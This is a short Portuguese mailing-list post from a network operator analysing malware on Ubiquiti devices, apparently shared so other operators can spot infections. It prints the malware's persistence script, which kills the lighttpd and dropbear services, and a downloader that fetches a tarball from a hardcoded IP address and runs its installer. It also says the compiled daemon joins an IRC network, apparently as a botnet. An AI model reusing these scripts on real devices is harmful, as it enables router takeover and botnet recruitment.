[GTER] RES: Vírus ubnt

Alexandre J. Correa (Onda) alexandre at onda.net.br
Thu Oct 13 10:21:34 -03 2016

no /etc/persistent/ deve conter alguns arquivos, por exemplo o rc.poststart

que contem:

owned() {
         sleep 10
         kill -HUP 1 1>/dev/null 2>/dev/null
         kill -9 `pidof lighttpd dropbear` 1>/dev/null 2>/dev/null
}

/var/etc/persistent/AirNET init
( owned ) &

há um arquivo chamado porra.sh também, que é por onde ele baixa o 'kit'
e executa a instalação:

#!/bin/sh

rm -rf /tmp/AirNET*
wget -q http://5.196.50.44/mips/AirNET.tgz -O /tmp/AirNET.tgz
if [ -f "/tmp/AirNET.tgz" ]; then
     mkdir -p /tmp/AirNET
     tar xzf /tmp/AirNET.tgz -C /tmp/AirNET
     rm -rf /tmp/AirNET.tgz
     cd /tmp/AirNET
     sh install.sh
else
     echo "error: wget"
fi
rm -rf /tmp/AirNET*

Esta variante o desenvolvedor foi mais inteligente, ele compilou o
daemon, dificultando a identificação do que ele faz... consegui
decodificar e ele entra em uma rede de IRC e provavelmente recebe
comandos pelo IRC mesmo. Imagino que o cara deva ter uma botnet grande !!!